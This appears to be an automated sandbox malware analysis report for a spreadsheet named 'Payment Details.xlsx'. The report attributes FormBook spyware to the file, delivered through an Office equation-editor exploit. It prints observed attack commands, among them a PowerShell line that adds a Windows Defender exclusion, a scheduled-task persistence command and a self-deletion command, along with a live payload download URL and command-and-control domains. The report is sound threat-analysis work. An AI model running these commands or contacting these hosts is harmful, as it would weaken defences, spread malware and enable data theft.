          Source: explorer.exe, 0000000A.00000000.549359259.0000000000255000.00000004.00000020.sdmpBinary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: vbc.exe, 00000004.00000002.473159938.00000000023FF000.00000004.00000001.sdmpBinary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
          Source: vbc.exe, 00000004.00000002.473159938.00000000023FF000.00000004.00000001.sdmpBinary or memory string: vmware
          Source: vbc.exe, 00000004.00000002.473612536.00000000033E9000.00000004.00000001.sdmpBinary or memory string: Y4*vMciU,ho)r;
          Source: explorer.exe, 0000000A.00000000.552591069.000000000457A000.00000004.00000001.sdmpBinary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0
          Source: vbc.exe, 00000004.00000003.472102078.0000000000809000.00000004.00000001.sdmpBinary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
          Source: explorer.exe, 0000000A.00000000.552449916.000000000449C000.00000004.00000001.sdmpBinary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0loQ&
          Source: explorer.exe, 0000000A.00000000.490732590.000000000029B000.00000004.00000020.sdmpBinary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0*N
          Source: explorer.exe, 0000000A.00000000.493807218.00000000045D4000.00000004.00000001.sdmpBinary or memory string: \\?\ide#cdromnecvmwar_vmware_sata_cd01_______________1.00____#6&373888b8&0&1.0.0#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: vbc.exe, 00000004.00000002.473159938.00000000023FF000.00000004.00000001.sdmpBinary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools
          Source: C:\Users\Public\vbc.exeCode function: 9_2_00409AB0 rdtsc 9_2_00409AB0
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Users\Public\vbc.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Users\Public\vbc.exeCode function: 9_2_00AC0080 mov ecx, dword ptr fs:[00000030h]9_2_00AC0080
          Source: C:\Users\Public\vbc.exeCode function: 9_2_00AC00EA mov eax, dword ptr fs:[00000030h]9_2_00AC00EA
          Source: C:\Users\Public\vbc.exeCode function: 9_2_00AE26F8 mov eax, dword ptr fs:[00000030h]9_2_00AE26F8
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_025A26F8 mov eax, dword ptr fs:[00000030h]11_2_025A26F8
          Source: C:\Users\Public\vbc.exeProcess queried: DebugPortJump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeProcess queried: DebugPortJump to behavior
          Source: C:\Users\Public\vbc.exeCode function: 9_2_0040ACF0 LdrLoadDll,9_2_0040ACF0
          Source: C:\Users\Public\vbc.exeMemory allocated: page read and write | page guardJump to behavior

          HIPS / PFW / Operating System Protection Evasion:

          barindex
          System process connects to network (likely due to code injection or exploit)Show sources
          Source: C:\Windows\explorer.exeNetwork Connect: 52.128.23.153 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.metafirstclass.com
          Sample uses process hollowing techniqueShow sources
          Source: C:\Users\Public\vbc.exeSection unmapped: C:\Windows\SysWOW64\rundll32.exe base address: D80000Jump to behavior
          Maps a DLL or memory area into another processShow sources
          Source: C:\Users\Public\vbc.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\Public\vbc.exeSection loaded: unknown target: C:\Windows\SysWOW64\rundll32.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\Public\vbc.exeSection loaded: unknown target: C:\Windows\SysWOW64\rundll32.exe protection: execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read writeJump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Injects a PE file into a foreign processesShow sources
          Source: C:\Users\Public\vbc.exeMemory written: C:\Users\Public\vbc.exe base: 400000 value starts with: 4D5AJump to behavior
          Queues an APC in another process (thread injection)Show sources
          Source: C:\Users\Public\vbc.exeThread APC queued: target process: C:\Windows\explorer.exeJump to behavior
          Modifies the context of a thread in another process (thread injection)Show sources
          Source: C:\Users\Public\vbc.exeThread register set: target process: 1764Jump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeThread register set: target process: 1764Jump to behavior
          Adds a directory exclusion to Windows DefenderShow sources
          Source: C:\Users\Public\vbc.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\OmnbtuhFsJys.exe
          Source: C:\Users\Public\vbc.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\OmnbtuhFsJys.exeJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe "C:\Users\Public\vbc.exe" Jump to behavior
          Source: C:\Users\Public\vbc.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\OmnbtuhFsJys.exeJump to behavior
          Source: C:\Users\Public\vbc.exeProcess created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\OmnbtuhFsJys" /XML "C:\Users\user\AppData\Local\Temp\tmpC92A.tmpJump to behavior
          Source: C:\Users\Public\vbc.exeProcess created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exeJump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\Public\vbc.exe"Jump to behavior
          Source: explorer.exe, 0000000A.00000000.549499857.0000000000750000.00000002.00020000.sdmp, explorer.exe, 0000000A.00000000.491344404.0000000000750000.00000002.00020000.sdmp, explorer.exe, 0000000A.00000000.483588339.0000000000750000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 0000000A.00000000.490555134.0000000000255000.00000004.00000020.sdmp, explorer.exe, 0000000A.00000000.549359259.0000000000255000.00000004.00000020.sdmpBinary or memory string: ProgmanG
          Source: explorer.exe, 0000000A.00000000.549499857.0000000000750000.00000002.00020000.sdmp, explorer.exe, 0000000A.00000000.491344404.0000000000750000.00000002.00020000.sdmp, explorer.exe, 0000000A.00000000.483588339.0000000000750000.00000002.00020000.sdmpBinary or memory string: !Progman
          Source: explorer.exe, 0000000A.00000000.549499857.0000000000750000.00000002.00020000.sdmp, explorer.exe, 0000000A.00000000.491344404.0000000000750000.00000002.00020000.sdmp, explorer.exe, 0000000A.00000000.483588339.0000000000750000.00000002.00020000.sdmpBinary or memory string: Program Manager<
          Source: C:\Users\Public\vbc.exeQueries volume information: C:\Users\Public\vbc.exe VolumeInformationJump to behavior
          Source: C:\Users\Public\vbc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\hh.exe VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior

          Stealing of Sensitive Information:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 9.0.vbc.exe.400000.8.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 9.2.vbc.exe.400000.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 9.0.vbc.exe.400000.10.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 9.0.vbc.exe.400000.6.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 9.0.vbc.exe.400000.10.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 9.0.vbc.exe.400000.8.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 9.2.vbc.exe.400000.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000009.00000002.506389190.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000000.489472241.00000000092FB000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.665478819.0000000000090000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.665720602.0000000000730000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000000.471438576.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.506321785.0000000000380000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000000.471899912.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.665582467.0000000000250000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000000.496796334.00000000092FB000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.506187794.0000000000250000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.473612536.00000000033E9000.00000004.00000001.sdmp, type: MEMORY

          Remote Access Functionality:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 9.0.vbc.exe.400000.8.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 9.2.vbc.exe.400000.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 9.0.vbc.exe.400000.10.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 9.0.vbc.exe.400000.6.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 9.0.vbc.exe.400000.10.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 9.0.vbc.exe.400000.8.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 9.2.vbc.exe.400000.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000009.00000002.506389190.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000000.489472241.00000000092FB000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.665478819.0000000000090000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.665720602.0000000000730000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000000.471438576.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.506321785.0000000000380000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000000.471899912.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.665582467.0000000000250000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000000.496796334.00000000092FB000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.506187794.0000000000250000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.473612536.00000000033E9000.00000004.00000001.sdmp, type: MEMORY

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid AccountsCommand and Scripting Interpreter1Scheduled Task/Job1Process Injection612Rootkit1Credential API Hooking1Security Software Discovery321Remote ServicesCredential API Hooking1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
          Default AccountsScheduled Task/Job1Boot or Logon Initialization ScriptsScheduled Task/Job1Masquerading111LSASS MemoryProcess Discovery2Remote Desktop ProtocolArchive Collected Data1Exfiltration Over BluetoothIngress Tool Transfer12Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsShared Modules1Logon Script (Windows)Logon Script (Windows)Disable or Modify Tools11Security Account ManagerVirtualization/Sandbox Evasion31SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsExploitation for Client Execution13Logon Script (Mac)Logon Script (Mac)Virtualization/Sandbox Evasion31NTDSRemote System Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol122SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptProcess Injection612LSA SecretsFile and Directory Discovery2SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.commonDeobfuscate/Decode Files or Information1Cached Domain CredentialsSystem Information Discovery112VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsStartup ItemsObfuscated Files or Information3DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
          Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobRundll321Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
          Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Software Packing13/etc/passwd and /etc/shadowSystem Network Connections DiscoverySoftware Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 signatures2 2 Behavior Graph ID: 528790 Sample: Payment Details.xlsx Startdate: 25/11/2021 Architecture: WINDOWS Score: 100 57 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->57 59 Multi AV Scanner detection for domain / URL 2->59 61 Found malware configuration 2->61 63 21 other signatures 2->63 10 EQNEDT32.EXE 12 2->10         started        15 EXCEL.EXE 33 29 2->15         started        process3 dnsIp4 47 202.55.132.154, 49165, 80 ADTEC-AS-VNADTECMediaJointStockCompanyVN Viet Nam 10->47 41 C:\Users\user\AppData\Local\...\vbc[1].exe, PE32 10->41 dropped 43 C:\Users\Public\vbc.exe, PE32 10->43 dropped 81 Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802) 10->81 17 vbc.exe 3 10->17         started        45 C:\Users\user\...\~$Payment Details.xlsx, data 15->45 dropped file5 signatures6 process7 file8 37 C:\Users\user\AppData\...\OmnbtuhFsJys.exe, PE32 17->37 dropped 39 C:\Users\user\AppData\Local\...\tmpC92A.tmp, XML 17->39 dropped 65 Multi AV Scanner detection for dropped file 17->65 67 Uses schtasks.exe or at.exe to add and modify task schedules 17->67 69 Adds a directory exclusion to Windows Defender 17->69 71 2 other signatures 17->71 21 vbc.exe 17->21         started        24 powershell.exe 6 17->24         started        26 schtasks.exe 17->26         started        signatures9 process10 signatures11 73 Modifies the context of a thread in another process (thread injection) 21->73 75 Maps a DLL or memory area into another process 21->75 77 Sample uses process hollowing technique 21->77 79 Queues an APC in another process (thread injection) 21->79 28 explorer.exe 21->28 injected process12 dnsIp13 49 www.metafirstclass.com 52.128.23.153, 49167, 80 DOSARRESTUS United States 28->49 83 System process connects to network (likely due to code injection or exploit) 28->83 32 rundll32.exe 28->32         started        signatures14 process15 signatures16 51 Modifies the context of a thread in another process (thread injection) 32->51 53 Maps a DLL or memory area into another process 32->53 55 Tries to detect virtualization through RDTSC time measurements 32->55 35 cmd.exe 32->35         started        process17

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.

          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          Payment Details.xlsx36%VirustotalBrowse
          Payment Details.xlsx33%ReversingLabsDocument-Office.Exploit.CVE-2017-11882

          Dropped Files

          SourceDetectionScannerLabelLink
          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe50%ReversingLabsByteCode-MSIL.Spyware.Noon
          C:\Users\user\AppData\Roaming\OmnbtuhFsJys.exe50%ReversingLabsByteCode-MSIL.Spyware.Noon
          C:\Users\Public\vbc.exe50%ReversingLabsByteCode-MSIL.Spyware.Noon

          Unpacked PE Files

          SourceDetectionScannerLabelLinkDownload
          9.2.vbc.exe.706380.3.unpack100%AviraTR/ATRAPS.GenDownload File
          9.2.vbc.exe.30000.0.unpack100%AviraTR/ATRAPS.GenDownload File
          9.0.vbc.exe.400000.10.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          9.0.vbc.exe.400000.6.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          9.0.vbc.exe.400000.8.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          9.2.vbc.exe.400000.2.unpack100%AviraTR/Crypt.ZPACK.GenDownload File

          Domains

          No Antivirus matches

          URLs

          SourceDetectionScannerLabelLink
          http://www.metafirstclass.com/g2fg/?hZlpd=H/0ZmZGK5jsRiriaZut4CEFQpFY2p/TAFyTzOdFvzC4udK1/lSWrgm9fn/kzXoflvKU/jw==&LRgXx=fbcXTtnx6x0%Avira URL Cloudsafe
          http://java.sun.com0%URL Reputationsafe
          http://www.icra.org/vocabulary/.0%URL Reputationsafe
          http://wellformedweb.org/CommentAPI/0%URL Reputationsafe
          http://202.55.132.154/384500000_1/vbc.exe13%VirustotalBrowse
          http://202.55.132.154/384500000_1/vbc.exe100%Avira URL Cloudmalware
          http://www.iis.fhg.de/audioPA0%URL Reputationsafe
          www.blancheshelley.xyz/g2fg/9%VirustotalBrowse
          www.blancheshelley.xyz/g2fg/100%Avira URL Cloudphishing
          http://computername/printers/printername/.printer0%Avira URL Cloudsafe
          http://www.%s.comPA0%URL Reputationsafe
          http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
          http://treyresearch.net0%URL Reputationsafe
          http://servername/isapibackend.dll0%Avira URL Cloudsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          www.metafirstclass.com
          		52.128.23.153
          		truetrue
            		unknown

            Contacted URLs

            NameMaliciousAntivirus DetectionReputation
            http://www.metafirstclass.com/g2fg/?hZlpd=H/0ZmZGK5jsRiriaZut4CEFQpFY2p/TAFyTzOdFvzC4udK1/lSWrgm9fn/kzXoflvKU/jw==&LRgXx=fbcXTtnx6xtrue
            • Avira URL Cloud: safe
            		unknown
            http://202.55.132.154/384500000_1/vbc.exetrue
            • 13%, Virustotal, Browse
            • Avira URL Cloud: malware
            		unknown
            www.blancheshelley.xyz/g2fg/true
            • 9%, Virustotal, Browse
            • Avira URL Cloud: phishing
            		low

            URLs from Memory and Binaries

            NameSourceMaliciousAntivirus DetectionReputation
            http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Checkexplorer.exe, 0000000A.00000000.492734563.0000000002CC7000.00000002.00020000.sdmpfalse
              		high
              http://www.windows.com/pctv.explorer.exe, 0000000A.00000000.485042288.0000000002AE0000.00000002.00020000.sdmpfalse
                		high
                http://java.sun.comexplorer.exe, 0000000A.00000000.490555134.0000000000255000.00000004.00000020.sdmp, explorer.exe, 0000000A.00000000.549359259.0000000000255000.00000004.00000020.sdmpfalse
                • URL Reputation: safe
                		unknown
                http://investor.msn.comexplorer.exe, 0000000A.00000000.485042288.0000000002AE0000.00000002.00020000.sdmpfalse
                  		high
                  http://www.msnbc.com/news/ticker.txtexplorer.exe, 0000000A.00000000.485042288.0000000002AE0000.00000002.00020000.sdmpfalse
                    		high
                    http://www.icra.org/vocabulary/.explorer.exe, 0000000A.00000000.492734563.0000000002CC7000.00000002.00020000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.vbc.exe, 00000004.00000002.474472621.0000000005540000.00000002.00020000.sdmp, explorer.exe, 0000000A.00000000.491540461.0000000001BE0000.00000002.00020000.sdmpfalse
                      		high
                      http://wellformedweb.org/CommentAPI/explorer.exe, 0000000A.00000000.552748099.0000000004650000.00000002.00020000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanervexplorer.exe, 0000000A.00000000.482071352.0000000008430000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.493807218.00000000045D4000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.554578826.0000000008430000.00000004.00000001.sdmpfalse
                        		high
                        http://investor.msn.com/explorer.exe, 0000000A.00000000.485042288.0000000002AE0000.00000002.00020000.sdmpfalse
                          		high
                          http://www.iis.fhg.de/audioPAexplorer.exe, 0000000A.00000000.552748099.0000000004650000.00000002.00020000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          http://www.piriform.com/ccleanerexplorer.exe, 0000000A.00000000.493703831.00000000044E7000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.482071352.0000000008430000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.493807218.00000000045D4000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.487992474.00000000044E7000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.554578826.0000000008430000.00000004.00000001.sdmpfalse
                            		high
                            http://computername/printers/printername/.printerexplorer.exe, 0000000A.00000000.552748099.0000000004650000.00000002.00020000.sdmpfalse
                            • Avira URL Cloud: safe
                            		low
                            http://www.%s.comPAvbc.exe, 00000004.00000002.474472621.0000000005540000.00000002.00020000.sdmp, explorer.exe, 0000000A.00000000.491540461.0000000001BE0000.00000002.00020000.sdmpfalse
                            • URL Reputation: safe
                            		low
                            http://www.autoitscript.com/autoit3explorer.exe, 0000000A.00000000.490555134.0000000000255000.00000004.00000020.sdmp, explorer.exe, 0000000A.00000000.549359259.0000000000255000.00000004.00000020.sdmpfalse
                              		high
                              https://support.mozilla.orgexplorer.exe, 0000000A.00000000.490555134.0000000000255000.00000004.00000020.sdmp, explorer.exe, 0000000A.00000000.549359259.0000000000255000.00000004.00000020.sdmpfalse
                                		high
                                http://windowsmedia.com/redir/services.asp?WMPFriendly=trueexplorer.exe, 0000000A.00000000.492734563.0000000002CC7000.00000002.00020000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                http://www.hotmail.com/oeexplorer.exe, 0000000A.00000000.485042288.0000000002AE0000.00000002.00020000.sdmpfalse
                                  		high
                                  http://treyresearch.netexplorer.exe, 0000000A.00000000.552748099.0000000004650000.00000002.00020000.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namevbc.exe, 00000004.00000002.473128964.00000000023E1000.00000004.00000001.sdmp, vbc.exe, 00000004.00000002.473159938.00000000023FF000.00000004.00000001.sdmpfalse
                                    		high
                                    http://servername/isapibackend.dllschtasks.exe, 00000007.00000002.463015056.0000000001D80000.00000002.00020000.sdmp, explorer.exe, 0000000A.00000000.493199905.0000000003E50000.00000002.00020000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		low

                                    Contacted IPs

                                    • No. of IPs < 25%
                                    • 25% < No. of IPs < 50%
                                    • 50% < No. of IPs < 75%
                                    • 75% < No. of IPs

                                    Public

                                    IPDomainCountryFlagASNASN NameMalicious
                                    52.128.23.153
                                    		www.metafirstclass.comUnited States
                                    		19324DOSARRESTUStrue
                                    202.55.132.154
                                    		unknownViet Nam
                                    		45540ADTEC-AS-VNADTECMediaJointStockCompanyVNtrue

                                    General Information

                                    Joe Sandbox Version:34.0.0 Boulder Opal
                                    Analysis ID:528790
                                    Start date:25.11.2021
                                    Start time:19:28:11
                                    Joe Sandbox Product:CloudBasic
                                    Overall analysis duration:0h 11m 5s
                                    Hypervisor based Inspection enabled:false
                                    Report type:full
                                    Sample file name:Payment Details.xlsx
                                    Cookbook file name:defaultwindowsofficecookbook.jbs
                                    Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                                    Number of analysed new started processes analysed:16
                                    Number of new started drivers analysed:0
                                    Number of existing processes analysed:0
                                    Number of existing drivers analysed:0
                                    Number of injected processes analysed:1
                                    Technologies:
                                    • HCA enabled
                                    • EGA enabled
                                    • HDC enabled
                                    • AMSI enabled
                                    Analysis Mode:default
                                    Analysis stop reason:Timeout
                                    Detection:MAL
                                    Classification:mal100.troj.expl.evad.winXLSX@13/26@1/2
                                    EGA Information:Failed
                                    HDC Information:
                                    • Successful, ratio: 33.4% (good quality ratio 31%)
                                    • Quality average: 78.7%
                                    • Quality standard deviation: 29.4%
                                    HCA Information:
                                    • Successful, ratio: 89%
                                    • Number of executed functions: 95
                                    • Number of non-executed functions: 54
                                    Cookbook Comments:
                                    • Adjust boot time
                                    • Enable AMSI
                                    • Found application associated with file extension: .xlsx
                                    • Found Word or Excel or PowerPoint or XPS Viewer
                                    • Attach to Office via COM
                                    • Scroll down
                                    • Close Viewer
                                    Warnings:
                                    Show All
                                    • Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, WMIADAP.exe, conhost.exe, svchost.exe
                                    • Not all processes where analyzed, report is missing behavior information
                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                    • Report size getting too big, too many NtQueryValueKey calls found.

                                    Simulations

                                    Behavior and APIs

                                    TimeTypeDescription
                                    19:28:37API Interceptor96x Sleep call for process: EQNEDT32.EXE modified
                                    19:28:41API Interceptor82x Sleep call for process: vbc.exe modified
                                    19:28:44API Interceptor10x Sleep call for process: powershell.exe modified
                                    19:28:45API Interceptor1x Sleep call for process: schtasks.exe modified
                                    19:29:06API Interceptor229x Sleep call for process: rundll32.exe modified
                                    19:30:10API Interceptor1x Sleep call for process: explorer.exe modified

                                    Joe Sandbox View / Context

                                    IPs

                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                    52.128.23.153ScanPIX.exeGet hashmaliciousBrowse
